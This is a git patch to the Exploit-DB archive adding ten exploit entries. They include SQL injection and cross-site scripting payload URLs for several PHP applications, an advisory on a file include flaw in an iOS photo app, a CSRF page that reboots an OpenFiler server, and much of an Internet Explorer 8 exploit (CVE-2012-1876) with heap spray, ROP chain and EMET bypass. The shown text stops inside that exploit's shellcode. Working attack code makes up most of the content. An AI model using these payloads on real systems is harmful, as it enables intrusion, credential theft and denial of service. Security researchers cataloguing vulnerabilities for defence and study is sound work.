From 501c894288ab40716b99d86a7ef88e9f1400af40 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Wed, 1 Oct 2014 04:44:03 +0000
Subject: [PATCH] Updated 10_01_2014

---
 files.csv                           |  10 +
 platforms/ios/webapps/34816.txt     | 239 ++++++++++++++++++
 platforms/php/webapps/34809.txt     |   9 +
 platforms/php/webapps/34810.txt     |   9 +
 platforms/php/webapps/34811.txt     |   9 +
 platforms/php/webapps/34812.html    |   9 +
 platforms/php/webapps/34813.txt     |   9 +
 platforms/php/webapps/34814.txt     |   9 +
 platforms/php/webapps/34818.html    |  47 ++++
 platforms/windows/remote/34815.html | 367 ++++++++++++++++++++++++++++
 platforms/windows/webapps/34817.rb  | 123 ++++++++++
 11 files changed, 840 insertions(+)
 create mode 100755 platforms/ios/webapps/34816.txt
 create mode 100755 platforms/php/webapps/34809.txt
 create mode 100755 platforms/php/webapps/34810.txt
 create mode 100755 platforms/php/webapps/34811.txt
 create mode 100755 platforms/php/webapps/34812.html
 create mode 100755 platforms/php/webapps/34813.txt
 create mode 100755 platforms/php/webapps/34814.txt
 create mode 100755 platforms/php/webapps/34818.html
 create mode 100755 platforms/windows/remote/34815.html
 create mode 100755 platforms/windows/webapps/34817.rb

diff --git a/files.csv b/files.csv
index 4df92cca8..50356dec6 100755
--- a/files.csv
+++ b/files.csv
@@ -31338,3 +31338,13 @@ id,file,description,date,author,platform,type,port
 34806,platforms/php/webapps/34806.txt,"JNM Guestbook 3.0 'index.php' Cross Site Scripting Vulnerability",2009-07-09,Moudi,php,webapps,0
 34807,platforms/php/webapps/34807.txt,"JNM Solutions DB Top Sites 1.0 'vote.php' Cross Site Scripting Vulnerability",2009-07-08,Moudi,php,webapps,0
 34808,platforms/php/webapps/34808.txt,"Rapidsendit Clone Script 'admin.php' Insecure Cookie Authentication Bypass Vulnerability",2009-07-08,NoGe,php,webapps,0
+34809,platforms/php/webapps/34809.txt,"Tausch Ticket Script 3 suchauftraege_user.php userid Parameter SQL Injection",2009-07-07,Moudi,php,webapps,0
+34810,platforms/php/webapps/34810.txt,"Tausch Ticket Script 3 vote.php descr Parameter SQL Injection",2009-07-07,Moudi,php,webapps,0
+34811,platforms/php/webapps/34811.txt,"Linea21 1.2.1 'search' Parameter Cross Site Scripting Vulnerability",2009-07-08,"599eme Man",php,webapps,0
+34812,platforms/php/webapps/34812.html,"Docebo 3.6 'description' Parameter Cross Site Scripting Vulnerability",2010-10-04,"High-Tech Bridge SA",php,webapps,0
+34813,platforms/php/webapps/34813.txt,"Elxis 2009.2 rev2631 SQL Injection",2010-10-05,"High-Tech Bridge SA",php,webapps,0
+34814,platforms/php/webapps/34814.txt,"SquirrelMail Virtual Keyboard Plugin 'vkeyboard.php' Cross Site Scripting Vulnerability",2010-10-05,"Moritz Naumann",php,webapps,0
+34815,platforms/windows/remote/34815.html,"Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037)",2014-09-29,"ryujin & sickness",windows,remote,0
+34816,platforms/ios/webapps/34816.txt,"GS Foto Uebertraeger 3.0 iOS - File Include Vulnerability",2014-09-29,Vulnerability-Lab,ios,webapps,0
+34817,platforms/windows/webapps/34817.rb,"Microsoft Exchange IIS HTTP Internal IP Address Disclosure",2014-09-29,"Nate Power",windows,webapps,0
+34818,platforms/php/webapps/34818.html,"OpenFiler 2.99.1 - CSRF Vulnerability",2014-09-29,"Dolev Farhi",php,webapps,446
diff --git a/platforms/ios/webapps/34816.txt b/platforms/ios/webapps/34816.txt
new file mode 100755
index 000000000..20f2674f7
--- /dev/null
+++ b/platforms/ios/webapps/34816.txt
@@ -0,0 +1,239 @@
+Document Title:
+===============
+GS Foto Uebertraeger v3.0 iOS - File Include Vulnerability
+
+
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=1325
+
+
+Release Date:
+=============
+2014-09-22
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1325
+
+
+Common Vulnerability Scoring System:
+====================================
+6.3
+
+
+Product & Service Introduction:
+===============================
+The best Photo Transfer app on the App Store!Photo Transfer allows you to quickly transfer photos between your iPhone, 
+iPad, PC or Mac using your local Wi-Fi network, without any 3rd party transfer utilities. It can easily access your photo 
+libraries via wifi from any computer with a web browser(IE/Chrome/Safari) on the same wifi network, very easy to use!
+
+(Copy of the Homepage: https://itunes.apple.com/en/app/wifi-fotos-ubertrager-+-uber/id902267412 )
+
+
+
+Abstract Advisory Information:
+==============================
+The Vulnerability Laboratory Research Team discovered a file include vulnerability in the official Golden Soft Photo/Foto Uebertraeger v3.0 iOS mobile application.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2014-09-22: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+Golden Soft
+Product: Foto ?bertr?ger - iOS Mobile Web Application 3.0
+
+
+Exploitation Technique:
+=======================
+Local
+
+
+Severity Level:
+===============
+High
+
+
+Technical Details & Description:
+================================
+A local file include web vulnerability has been discovered in the official Briefcase Pro v4.0 iOS mobile wifi web-application.
+The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system 
+specific path commands to compromise the mobile web-application.
+
+The web vulnerability is located in the `filename and albumname` values of the `uploadPhotoPost` module. Remote attackers are able to inject 
+own files with malicious `filename or albumname` values in the `uploadPhotoPost` POST method request to compromise the mobile web-application. 
+The local file/path include execution occcurs in the index dir listing of the wifi interface context. The attacker is able to inject the local 
+file include request by usage of the `wifi interface` in connection with the vulnerable upload request. 
+
+Remote attackers are also able to exploit the filename/albumname validation issue in combination with persistent injected script codes to execute 
+different local malicious attacks requests. The attack vector is on the application-side of the wifi service and the request method to inject is POST. 
+
+The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.3. 
+Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account. Successful exploitation 
+of the local file include web vulnerability results in mobile application or connected device component compromise.
+
+
+Request Method(s):
+				[+] [POST]
+
+Vulnerable Module(s):
+				[+] uploadPhotoPost
+
+Vulnerable Parameter(s):
+				[+] filename & albumname
+
+Affected Module(s):
+				[+] Index Path Dir Listing (http://localhost/)
+
+
+Proof of Concept (PoC):
+=======================
+The local file include web vulnerability can be exploited by local wifi attackers in the network without privileged application user account or user interaction.
+For security demonstration or to reproduce the security vulnerability follow the provided information or steps below to continue.
+
+
+PoC: Url
+http://localhost/./[LOCAL FILE INCLUDE VULNERABILITY VIA FILENAME VALUE!]
+
+
+PoC: Exploit Photo Transfer.htm
+
+<div class="album-title">>"./[LOCAL FILE INCLUDE VULNERABILITY VIA FILENAME VALUE!].png</div>
+<a href="/group/1/0/100"><img class="album-overlay" alt="" width="140" height="160" src="/cvab-overlay.png">                                    
+<img class="album-thumb" width="90" height="90" alt="" src="/api/group/poster/1">                                    </a>
+                       <!-- <div class="album-folder-img"><img alt="" width="140" height="160" src="/cvab.png"></div> -->
+                    </div>
+                </div>
+            </div>
+            <!--end of preview thumbnails -->
+        </div>
+        <!-- end of wrapper-->
+        <div id="upload" class="wrapper">
+            <div id="intro">
+                <div class="col-1 padding-t20">
+                    <!-- <h1><a href="/uploadPage"><img src="/upload.png" alt="" width="76" height="76"><br><br> -->
+                    <!-- UPLOAD</a></h1> -->
+                    <!-- <h2 class="center">Photos FROM This Computer</h2> -->
+                </div>
+            </div>
+        </div>
+        <!-- end of wrapper-->
+        <div id="container">
+            <div id="bg">
+            </div>
+        </div>
+        <!-- end of container and background-->
+        <div class="menu-bg ui-dark rad-0 center">
+            <div class="logo">
+                <a href="/groups">Photo Transfer +</a></div>
+        </div>
+        <!-- menu -->
+    </body>
+</html>
+</iframe></div>
+
+
+
+--- PoC Session Logs [POST] ---
+Status: 200[OK]
+POST http://localhost/uploadPhotoPost Load Flags[LOAD_BYPASS_CACHE  ] Gr??e des Inhalts[7] Mime Type[application/x-unknown-content-type]
+   Request Header:
+      Host[localhost]
+      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
+      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+      Accept-Language[de,en-US;q=0.7,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+      Referer[http://localhost/uploadpage]
+      Content-Length[818]
+      Content-Type[multipart/form-data; boundary=---------------------------4611772826829]
+      Cookie[plupload_ui_view=thumbs]
+      Connection[keep-alive]
+      Pragma[no-cache]
+      Cache-Control[no-cache]
+   POST-Daten:
+      POST_DATA[-----------------------------4611772826829
+Content-Disposition: form-data; name="name"
+
+./[LOCAL FILE INCLUDE VULNERABILITY VIA FILENAME VALUE!].png
+-----------------------------4611772826829
+Content-Disposition: form-data; name="file"; filename="./[LOCAL FILE INCLUDE VULNERABILITY VIA FILENAME VALUE!].png"
+Content-Type: image/png
+
+
+Status: 200[OK]
+GET http://localhost/main/home Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Gr??e des Inhalts[210] Mime Type[application/x-unknown-content-type]
+   Request Header:
+      Host[localhost]
+      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
+      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+      Accept-Language[de,en-US;q=0.7,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+      Referer[http://localhost/uploadpage]
+      Cookie[plupload_ui_view=thumbs]
+      Connection[keep-alive]
+   Response Header:
+      Accept-Ranges[bytes]
+      Content-Length[210]
+      Connection[keep-alive]
+      Date[Tue, 16 Sep 2014 15:07:38 GMT]
+
+
+
+Solution - Fix & Patch:
+=======================
+The security vulnerability can be patched by a secure parse and encode of the file name value in the upload POST method request or sync.
+Encode the file dir listing names and data output values to prevent further file include attacks. Restrict the file name extension validation 
+to fully secure the upload mechanism.
+
+
+Security Risk:
+==============
+The security risk of the local file include web vulnerability in the filename value of the application is estimated as high.
+
+
+Credits & Authors:
+==================
+Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either 
+expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers 
+are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even 
+if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation 
+of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break 
+any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
+
+Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
+Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       		- admin@evolution-sec.com
+Section:    dev.vulnerability-db.com	 	- forum.vulnerability-db.com 		       		- magazine.vulnerability-db.com
+Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
+electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
+Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
+is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
+(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
+
+				Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
+
+
+-- 
+VULNERABILITY LABORATORY RESEARCH TEAM
+DOMAIN: www.vulnerability-lab.com
+CONTACT: research@vulnerability-lab.com
+
+
diff --git a/platforms/php/webapps/34809.txt b/platforms/php/webapps/34809.txt
new file mode 100755
index 000000000..9abb95ac9
--- /dev/null
+++ b/platforms/php/webapps/34809.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43710/info
+
+Tausch Ticket Script is prone to multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Tausch Ticket Script 3 is vulnerable; other versions may also be affected.
+
+http://www.example.com/suchauftraege_user.php?userid=[SQL] 
\ No newline at end of file
diff --git a/platforms/php/webapps/34810.txt b/platforms/php/webapps/34810.txt
new file mode 100755
index 000000000..e0305fff3
--- /dev/null
+++ b/platforms/php/webapps/34810.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43710/info
+ 
+Tausch Ticket Script is prone to multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input.
+ 
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+ 
+Tausch Ticket Script 3 is vulnerable; other versions may also be affected.
+
+http://www.example.com/vote.php?descr=[SQL] 
\ No newline at end of file
diff --git a/platforms/php/webapps/34811.txt b/platforms/php/webapps/34811.txt
new file mode 100755
index 000000000..4c1ffc0fb
--- /dev/null
+++ b/platforms/php/webapps/34811.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43711/info
+
+Linea21 is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Linea21 1.2.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/public/index.php?search="&#039;><script>alert(&#039;xss&#039;)</script>&rub=resultats-recherche&valid.x=4&valid.y=6&valid=valider
\ No newline at end of file
diff --git a/platforms/php/webapps/34812.html b/platforms/php/webapps/34812.html
new file mode 100755
index 000000000..9bf78c92d
--- /dev/null
+++ b/platforms/php/webapps/34812.html
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43721/info
+
+Docebo is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Docebo 3.6.0.4 is vulnerable; prior versions may also be affected.
+
+<form action="http://www.example.com/doceboLms/index.php?modname=advice&op=upadvice" method="post" name="main" > <input type="hidden" name="idAdvice" value="2" /> <input type="hidden" name="title" value="Hello" /> <input type="hidden" name="description" value='1"><script>alert(document.cookie)</script>' /> <input type="hidden" name="addadvice" value="Save changes" /> </form> <script> document.main.submit(); </script> 
\ No newline at end of file
diff --git a/platforms/php/webapps/34813.txt b/platforms/php/webapps/34813.txt
new file mode 100755
index 000000000..f86901192
--- /dev/null
+++ b/platforms/php/webapps/34813.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43743/info
+
+Elxis is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Elxis 2009.2 electra rev2631 is vulnerable; other versions may be affected. 
+
+http://www.example.com/administrator/index2.php?option=com_content&sectionid=0&task=edit&hidemainmenu=1&id=999'+UNION+SELECT+1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+--+c 
\ No newline at end of file
diff --git a/platforms/php/webapps/34814.txt b/platforms/php/webapps/34814.txt
new file mode 100755
index 000000000..b076b46fc
--- /dev/null
+++ b/platforms/php/webapps/34814.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43749/info
+
+The Virtual Keyboard plugin for SquirrelMail is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Virtual Keyboard 0.9.1 and prior are vulnerable.
+
+http://www.example.com/plugins/vkeyboard/vkeyboard.php?passformname=%22%3E%3Cscript%3Ealert%28%27XSS%27%29;%3C/script%3E%3Cscript%3E/*%20
\ No newline at end of file
diff --git a/platforms/php/webapps/34818.html b/platforms/php/webapps/34818.html
new file mode 100755
index 000000000..6bc774661
--- /dev/null
+++ b/platforms/php/webapps/34818.html
@@ -0,0 +1,47 @@
+<!--
+# Exploit Title: DoS via CSRF in openfiler
+# Exploit author: Dolev Farhi @dolevff
+# Date 07/05/2014
+# Vendor homepage: http://www.openfiler.com
+# Affected Software version: 2.99.1
+# Alerted vendor: 7.5.14
+# CVE: N/A
+ 
+ 
+Software Description
+=====================
+Openfiler is a network storage operating system. With the features we built into Openfiler, you can take advantage of file-based Network Attached Storage and block-based
+Storage Area Networking functionality in a single cohesive framework.
+ 
+ 
+ 
+Vulnerability Description
+=========================
+it is possible to shutdown/reboot a server running openfiler and cause denial of service via CSRF due to missing session tokens.
+ 
+ 
+Steps to reproduce / PoC:
+=========================
+-->
+<html>
+<div align="center">
+<pre>
+
+<h2><b>DoS <b></h2>
+<body>
+<form
+action="https://ip.add.re.ss:446/admin/system_shutdown.html"
+method="POST">
+<input type="hidden" name="shutdowntype" value="reboot" />
+<input type="hidden" name="delay" value="0" />
+<input type="hidden" name="action" value="Shutdown" />
+<input type="submit" name="submit" value="Attack" />
+    </form>
+    </body>
+</div>
+</html>
+ 
+ 
+
+
+
diff --git a/platforms/windows/remote/34815.html b/platforms/windows/remote/34815.html
new file mode 100755
index 000000000..1386375e4
--- /dev/null
+++ b/platforms/windows/remote/34815.html
@@ -0,0 +1,367 @@
+<!--
+** Internet Explorer 8 Fixed Col Span ID full ASLR, DEP and EMET 5.0 bypass
+** Exploit Coded by sickness || EMET 5.0 bypass by ryujin
+** http://www.offensive-security.com/vulndev/disarming-emet-v5-0/ ?
+** Affected Software: Internet Explorer 8
+** Vulnerability: Fixed Col Span ID
+** CVE: CVE-2012-1876
+** Tested on Windows 7 (x86) - IE 8.0.7601.17514 & EMET 5.0
+-->
+
+<html>
+<body>
+<div id="evil"></div>
+<table style="table-layout:fixed" ><col id="132" width="41" span="9" >  </col></table>
+<script language='javascript'>
+
+function strtoint(str) {
+        return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);
+}
+
+var free = "EEEE";
+while ( free.length < 500 ) free += free;
+
+var string1 = "AAAA";
+while ( string1.length < 500 ) string1 += string1;
+
+var string2 = "BBBB";
+while ( string2.length < 500 ) string2 += string2;
+
+var fr = new Array();
+var al = new Array();
+var bl = new Array();
+
+var div_container = document.getElementById("evil");
+div_container.style.cssText = "display:none";
+
+for (var i=0; i < 500; i+=2) {
+        fr[i] = free.substring(0, (0x100-6)/2);
+        al[i] = string1.substring(0, (0x100-6)/2);
+        bl[i] = string2.substring(0, (0x100-6)/2);
+        var obj = document.createElement("button");
+        div_container.appendChild(obj);
+}
+
+for (var i=200; i<500; i+=2 ) {
+        fr[i] = null;
+        CollectGarbage();
+}
+
+function heapspray(cbuttonlayout) {
+    CollectGarbage();
+    var rop = cbuttonlayout + 4161; // RET
+    var rop = rop.toString(16);
+    var rop1 = rop.substring(4,8);
+    var rop2 = rop.substring(0,4); // } RET
+
+    var rop = cbuttonlayout + 11360; // POP EBP
+    var rop = rop.toString(16);
+    var rop3 = rop.substring(4,8);
+    var rop4 = rop.substring(0,4); // } RET
+
+    var rop = cbuttonlayout + 111675; // XCHG EAX,ESP
+    var rop = rop.toString(16);
+    var rop5 = rop.substring(4,8);
+    var rop6 = rop.substring(0,4); // } RET
+
+    var rop = cbuttonlayout + 12377; // POP EBX
+    var rop = rop.toString(16);
+    var rop7 = rop.substring(4,8);
+    var rop8 = rop.substring(0,4); // } RET
+
+    var rop = cbuttonlayout + 642768; // POP EDX
+    var rop = rop.toString(16);
+    var rop9 = rop.substring(4,8);
+    var rop10 = rop.substring(0,4); // } RET
+
+    var rop = cbuttonlayout + 12201; // POP ECX --> Changed
+    var rop = rop.toString(16);
+    var rop11 = rop.substring(4,8);
+    var rop12 = rop.substring(0,4); // } RET
+
+    var rop = cbuttonlayout + 5504544; // Writable location
+    var rop = rop.toString(16);
+    var writable1 = rop.substring(4,8);
+    var writable2 = rop.substring(0,4); // } RET
+
+    var rop = cbuttonlayout + 12462; // POP EDI
+    var rop = rop.toString(16);
+    var rop13 = rop.substring(4,8);
+    var rop14 = rop.substring(0,4); // } RET
+
+    var rop = cbuttonlayout + 12043; // POP ESI --> changed
+    var rop = rop.toString(16);
+    var rop15 = rop.substring(4,8);
+    var rop16 = rop.substring(0,4); // } RET
+
+    var rop = cbuttonlayout + 63776; // JMP EAX
+    var rop = rop.toString(16);
+    var jmpeax1 = rop.substring(4,8);
+    var jmpeax2 = rop.substring(0,4); // } RET
+
+    var rop = cbuttonlayout + 85751; // POP EAX
+    var rop = rop.toString(16);
+    var rop17 = rop.substring(4,8);
+    var rop18 = rop.substring(0,4); // } RET
+
+    var rop = cbuttonlayout + 4936; // VirtualProtect()
+    var rop = rop.toString(16);
+    var vp1 = rop.substring(4,8);
+    var vp2 = rop.substring(0,4); // } RET
+
+    var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX]
+    var rop = rop.toString(16);
+    var rop19 = rop.substring(4,8);
+    var rop20 = rop.substring(0,4); // } RET
+
+    var rop = cbuttonlayout + 234657; // PUSHAD
+    var rop = rop.toString(16);
+    var rop21 = rop.substring(4,8);
+    var rop22 = rop.substring(0,4); // } RET
+
+
+    var rop = cbuttonlayout + 408958; // PUSH ESP
+    var rop = rop.toString(16);
+    var rop23 = rop.substring(4,8);
+    var rop24 = rop.substring(0,4); // } RET
+
+    var rop = cbuttonlayout + 2228408; // POP ECX
+    var rop = rop.toString(16);
+    var rop25 = rop.substring(4,8);
+    var rop26 = rop.substring(0,4); // } RET
+
+    var rop = cbuttonlayout + 1586172; // POP EAX
+    var rop = rop.toString(16);
+    var rop27 = rop.substring(4,8);
+    var rop28 = rop.substring(0,4); // } RET
+
+    var rop = cbuttonlayout + 1589179; // MOV EAX,DWORD PTR [EAX]
+    var rop = rop.toString(16);
+    var rop29 = rop.substring(4,8);
+    var rop30 = rop.substring(0,4); // } RET
+
+    var rop = cbuttonlayout + 1884912; // PUSH EAX
+    var rop = rop.toString(16);
+    var rop31 = rop.substring(4,8);
+    var rop32 = rop.substring(0,4); // } RET
+
+    var rop = cbuttonlayout + 2140694; // ADD EAX,ECX
+    var rop = rop.toString(16);
+    var rop33 = rop.substring(4,8);
+    var rop34 = rop.substring(0,4); // } RET
+
+    var rop = cbuttonlayout + 2364867; // MOV DWORD PTR [EAX],ECX
+    var rop = rop.toString(16);
+    var rop35 = rop.substring(4,8);
+    var rop36 = rop.substring(0,4); // } RET
+
+    var rop = cbuttonlayout + 5036248; // ADD ESP,0C
+    var rop = rop.toString(16);
+    var rop37 = rop.substring(4,8);
+    var rop38 = rop.substring(0,4); // } RET
+
+    var rop = cbuttonlayout + 1816868; // MOV DWORD PTR DS:[ESI],EAX
+    var rop = rop.toString(16);
+    var rop39 = rop.substring(4,8);
+    var rop40 = rop.substring(0,4); // } RET
+
+    var rop = cbuttonlayout + 3660458; // MOV EDX,EAX # MOV EAX,EDX # POP ESI
+    var rop = rop.toString(16);
+    var rop41 = rop.substring(4,8);
+    var rop42 = rop.substring(0,4); // } RET
+
+    var rop = cbuttonlayout + 1560432; // PUSH EDX # CALL EAX
+    var rop = rop.toString(16);
+    var rop43 = rop.substring(4,8);
+    var rop44 = rop.substring(0,4); // } RET
+
+    var getmodulew = cbuttonlayout + 4840; // GetModuleHandleW
+    var getmodulew = getmodulew.toString(16);
+    var getmodulew1 = getmodulew.substring(4,8);
+    var getmodulew2 = getmodulew.substring(0,4); // } RET
+
+
+    var shellcode = unescape("%u4141%u4141%u4242%u4242%u4343%u4343"); // PADDING
+    shellcode+= unescape("%u4141%u4141%u4242%u4242%u4343%u4343"); // PADDING
+    shellcode+= unescape("%u4141%u4141"); // PADDING
+
+    shellcode+= unescape("%u"+rop1+"%u"+rop2); // RETN
+    shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP # RETN
+    shellcode+= unescape("%u"+rop5+"%u"+rop6); // XCHG EAX,ESP # RETN
+
+    // EMET disable part 0x01
+    // Implement the Tachyon detection grid to overcome the Romulan cloaking device.
+    shellcode+= unescape("%u"+rop27+"%u"+rop28);    // POP EAX # RETN
+    shellcode+= unescape("%u"+getmodulew1+"%u"+getmodulew2);    // GetModuleHandleW Ptr
+    shellcode+= unescape("%u"+rop29+"%u"+rop30);    // MOV EAX,DWORD PTR [EAX] # RETN
+    shellcode+= unescape("%u"+rop31+"%u"+rop32);    // PUSH EAX # RETN
+    shellcode+= unescape("%u"+rop25+"%u"+rop26);    // POP ECX # RETN
+    shellcode+= unescape("%u10c4%u076d");           // EMET_STRING_PTR (GetModuleHandle argument)
+    shellcode+= unescape("%ua84c%u000a");           // EMET_CONFIG_STRUCT offset 
+    shellcode+= unescape("%u"+rop15+"%u"+rop16);    // POP ESI
+    shellcode+= unescape("%u10c0%u076d");           // MEM_ADDRESS_PTR (Store EMET base address here for later)
+    shellcode+= unescape("%u"+rop39+"%u"+rop40);    // MOV DWORD PTR DS:[ESI],EAX
+    shellcode+= unescape("%u"+rop33+"%u"+rop34);    // ADD EAX,ECX # RETN (Get the address of EMET_CONFIG_STRUCT)
+    shellcode+= unescape("%u"+rop19+"%u"+rop20);    // MOV EAX,DWORD PTR DS:[EAX]
+    shellcode+= unescape("%u"+rop15+"%u"+rop16);    // POP ESI
+    shellcode+= unescape("%u104c%u076d");           // Get fake DecodePointer argument from the stack and update it with the encoded value
+    shellcode+= unescape("%u"+rop39+"%u"+rop40);    // MOV DWORD PTR DS:[ESI],EAX
+    shellcode+= unescape("%u"+rop27+"%u"+rop28);    // POP EAX # RETN
+    shellcode+= unescape("%u10c0%u076d");           // Get EMET base address Ptr
+    shellcode+= unescape("%u"+rop19+"%u"+rop20);    // MOV EAX,DWORD PTR DS:[EAX]
+    shellcode+= unescape("%u"+rop25+"%u"+rop26);    // POP ECX # RETN
+    shellcode+= unescape("%u80b0%u0004");           // Get DecodePointer offset from the stack 
+    shellcode+= unescape("%u"+rop33+"%u"+rop34);    // ADD EAX,ECX # RETN (DecodePointer in IAT)
+    shellcode+= unescape("%u"+rop19+"%u"+rop20);    // MOV EAX,DWORD PTR DS:[EAX]
+    shellcode+= unescape("%u"+rop31+"%u"+rop32);    // PUSH EAX # RETN
+    shellcode+= unescape("%u"+rop15+"%u"+rop16);    // POP ESI
+    shellcode+= unescape("%u9090%u9090");           // Fake DecodePointer argument (Will be patched)
+    shellcode+= unescape("%u10bc%u076d");           // MEM_ADDRESS_PTR (Store decoded pointer here here for later)
+    shellcode+= unescape("%u"+rop39+"%u"+rop40);    // MOV DWORD PTR DS:[ESI],EAX
+    shellcode+= unescape("%u"+rop25+"%u"+rop26);    // POP ECX # RETN
+    shellcode+= unescape("%u0558%u0000");           // ROP Protections offset
+    shellcode+= unescape("%u"+rop33+"%u"+rop34);    // ADD EAX,ECX # RETN
+    shellcode+= unescape("%u"+rop25+"%u"+rop26);    // POP ECX # RETN
+    shellcode+= unescape("%u0000%u0000");           // NULL
+    shellcode+= unescape("%u"+rop35+"%u"+rop36);    // MOV DWORD PTR [EAX],ECX # RETN
+    // EMET disable part 0x01 end
+
+    // Performing a standard Kumeh maneuver ... (VirtualProtect mona chain)
+    shellcode+= unescape("%u"+rop3+"%u"+rop4);      // POP EBP
+    shellcode+= unescape("%u"+rop3+"%u"+rop4);      // POP EBP
+    shellcode+= unescape("%u"+rop7+"%u"+rop8);      // POP EBP
+    shellcode+= unescape("%u1024%u0000");           // Size 0x00001024
+    shellcode+= unescape("%u"+rop9+"%u"+rop10);     // POP EDX
+    shellcode+= unescape("%u0040%u0000");           // 0x00000040
+    shellcode+= unescape("%u"+rop11+"%u"+rop12);    // POP ECX
+    shellcode+= unescape("%u"+writable1+"%u"+writable2);  // Writable Location
+    shellcode+= unescape("%u"+rop13+"%u"+rop14);    // POP EDI
+    shellcode+= unescape("%u"+rop1+"%u"+rop2);      // RET
+    shellcode+= unescape("%u"+rop15+"%u"+rop16);    // POP ESI
+    shellcode+= unescape("%u"+jmpeax1+"%u"+jmpeax2);// JMP EAX
+    shellcode+= unescape("%u"+rop17+"%u"+rop18);    // POP EAX
+    shellcode+= unescape("%u"+vp1+"%u"+vp2);        // VirtualProtect()
+    shellcode+= unescape("%u"+rop19+"%u"+rop20);    // MOV EAX,DWORD PTR DS:[EAX]
+    shellcode+= unescape("%u"+rop21+"%u"+rop22);    // PUSHAD
+    shellcode+= unescape("%u"+rop23+"%u"+rop24);    // PUSH ESP
+
+    // Store various pointers here
+    shellcode+= unescape("%u9090%u9090");           // NOPs
+    shellcode+= unescape("%u9090%u14eb");           // NOPs
+    shellcode+= unescape("%u4242%u4242");           // Decoded CONFIG structure pointer
+    shellcode+= unescape("%u4141%u4141");           // Store BaseAddress address on the *stack*
+    shellcode+= "EMET";                             // EMET string
+    shellcode+= unescape("%u0000%u0000");           // EMET string
+    shellcode+= unescape("%u9090%u9090");           // NOPs
+    shellcode+= unescape("%u9090%u9090");           // NOPs
+    // Store various pointers here
+
+    // EMET disable part 0x02
